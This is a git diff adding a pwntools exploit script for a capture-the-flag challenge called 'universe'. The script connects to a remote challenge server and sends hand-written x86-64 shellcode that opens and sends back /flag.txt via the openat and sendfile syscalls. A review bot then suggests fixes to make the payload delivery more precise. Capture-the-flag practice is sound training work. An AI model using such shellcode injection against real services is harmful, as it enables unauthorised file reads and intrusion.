diff --git a/africabattlectf_2024/universe/a.py b/africabattlectf_2024/universe/a.py
new file mode 100644
index 0000000..7d9676c
--- /dev/null
+++ b/africabattlectf_2024/universe/a.py
@@ -0,0 +1,28 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./universe", checksec=False)
+# r = process()
+r = remote("challenge.bugpwn.com", 1004)
+
+# openat + sendfile
+shellcode="""
+lea rsi, [rdx+35]
+mov edi, -100
+xor rdx, rdx
+xor r10, r10
+add ax, 257
+syscall
+mov rsi, rax
+mov al, 40
+shr edi, 255
+add r10b, 255
+syscall
+"""
+shellcode = asm(shellcode)
+shellcode += b"/flag.txt\0"
+shellcode += b"\x90"*(4096-len(shellcode))
+r.sendline(shellcode)
+
+r.interactive()
\ No newline at end of file
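Review bot: `r.sendline(shellcode)` appends a newline after the payload has already been padded to exactly 4096 bytes, so 4097 bytes go over the wire; the remote read size is not visible here, but since the padding is computed to a fixed length, `r.send(shellcode)` is the precise call and the magic number deserves a name, e.g. `BUF_SIZE = 4096` used in both the padding expression and a comment on the `r.send` line. The local/remote switch is a commented-out `# r = process()` line, which is easy to leave in the wrong state; pwntools' `args` convention, `r = remote("challenge.bugpwn.com", 1004) if args.REMOTE else process()`, keeps both paths live without editing the file. The padding expression also silently produces empty bytes when `len(shellcode)` exceeds 4096 because a negative repeat count yields `b""`, so a guard such as `assert len(shellcode) <= 4096` (or an explicit `raise`) would surface an oversized payload instead of sending a truncated-looking one.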